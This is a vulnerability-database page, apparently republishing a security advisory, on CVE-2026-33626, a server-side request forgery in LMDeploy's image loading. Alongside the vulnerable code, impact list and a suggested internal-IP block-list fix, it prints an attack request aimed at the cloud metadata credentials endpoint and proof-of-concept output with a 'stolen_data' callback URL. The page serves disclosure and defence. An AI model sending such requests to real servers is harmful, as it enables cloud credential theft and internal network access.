7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2026-33626

CVE-2026-33626: LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading

Summary

A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The load_image() function in lmdeploy/vl/utils.py fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.

Affected Versions

Tested on: main branch (2026-02-04)
Affected: All versions prior to 0.12.3

Vulnerable Code

File: lmdeploy/vl/utils.py (lines 64-67)

def load_image(image_url: Union[str, Image.Image]) -> Image.Image:
    # ...
    if image_url.startswith('http'):
        response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT)
        # NO VALIDATION OF URL/IP BEFORE REQUEST

Also affected: encode_image_base64() function (lines 26-29)

Root Cause

No validation of URLs before fetching
No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)
Server binds to 0.0.0.0 by default (api_server.py line 1393)
API keys disabled by default

Attack Scenario

LMDeploy server deployed with vision-language model
Attacker sends request to /v1/chat/completions with malicious image_url:

POST /v1/chat/completions
{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user", 
    "content": [
      {"type": "text", "text": "Describe this image"},
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
    ]
  }]
}

Server fetches URL without validation
Attacker receives cloud credentials

Proof of Concept

Verified Exploitation Result

╔═══════════════════════════════════════════════════════════════════════╗
║  LMDeploy SSRF Vulnerability - Proof of Concept                       ║
╚═══════════════════════════════════════════════════════════════════════╝

[1] Starting callback server on port 8889...
[2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY
[3] Calling vulnerable load_image() function...

======================================================================
[+] SSRF CALLBACK RECEIVED!
======================================================================
    Time:       2026-02-04 16:10:57
    Path:       /SSRF_PROOF?stolen_data=AWS_SECRET_KEY
    Client:     127.0.0.1:51154
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
======================================================================

✅ SSRF VULNERABILITY CONFIRMED!

Impact

Cloud Credential Theft: Access AWS/GCP/Azure metadata APIs
Internal Service Access: Reach services not exposed to internet
Information Disclosure: Port scan internal networks
Lateral Movement: Pivot point for further attacks

Recommended Fix

from urllib.parse import urlparse
import ipaddress
import socket

BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('169.254.0.0/16'),
]

def is_safe_url(url: str) -> bool:
    try:
        parsed = urlparse(url)
        if parsed.scheme not in ('http', 'https'):
            return False
        ip = socket.gethostbyname(parsed.hostname)
        ip_addr = ipaddress.ip_address(ip)
        return not any(ip_addr in network for network in BLOCKED_NETWORKS)
    except:
        return False

Credit

This vulnerability was discovered as part of Orca Security's research.

Researcher: Igor Stepansky
Organization: Orca Security
Emails: igor.stepansky@orca.security
iggy.p0pi@orca.security

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2026-33626

CVE-2026-33626:

7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
lmdeploy	pip	<= 0.12.2

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a Server-Side Request Forgery (SSRF) in the LMDeploy library, which allows an unauthenticated attacker to make the server issue requests to arbitrary URLs. The root cause is the lack of input validation on URLs provided for image loading.

The analysis of the provided patch in commit 71d64a339edb901e9005358e0633fbbab367d626 shows that the core vulnerability is in the _load_http_url function located in lmdeploy/vl/media/connection.py. This function was responsible for making the HTTP request via requests.get without ensuring the destination URL was not a private or internal address. The fix involves adding a new function, _is_safe_url, which performs this validation, and ensuring _load_http_url calls it before proceeding.

The vulnerability report explicitly identifies load_image in lmdeploy/vl/utils.py as the primary vulnerable function that takes the user-supplied URL. It also mentions encode_image_base64 as being affected. This indicates a call chain where encode_image_base64 may call load_image, which in turn leads to the call to the unsafe _load_http_url function. Therefore, all three functions would likely appear in a stack trace during an exploit and are considered part of the vulnerable functionality.

Vulnerable functions

_load_http_url

lmdeploy/vl/media/connection.py

This function is responsible for fetching content from a given URL. Before the patch, it directly used `requests.get` without validating if the URL pointed to an internal or private IP address, making it vulnerable to SSRF. The patch added a call to the `_is_safe_url` function to validate the URL before making the request.

load_image

lmdeploy/vl/utils.py

This function is the entry point for loading an image from a URL. It takes the user-provided URL and passes it to other functions for processing, including the vulnerable `_load_http_url` function, without performing any validation itself. It is a key component in the vulnerable call chain.

encode_image_base64

lmdeploy/vl/utils.py

This function is part of the vulnerable workflow. It likely calls the `load_image` function to handle image data from a URL before encoding it. As part of the call stack processing the malicious user input, it would appear in a runtime profile during exploitation.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

7.5

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2026-33626: LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading

Summary

Affected Versions

Vulnerable Code

Root Cause

Attack Scenario

Proof of Concept

Verified Exploitation Result

Impact

Recommended Fix

Credit

CVE-2026-33626:

7.5

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

7.5

7.5

CVE-2026-33626: LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading

Summary

Affected Versions

Vulnerable Code

Root Cause

Attack Scenario

Proof of Concept

Verified Exploitation Result

Impact

Recommended Fix

Credit

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI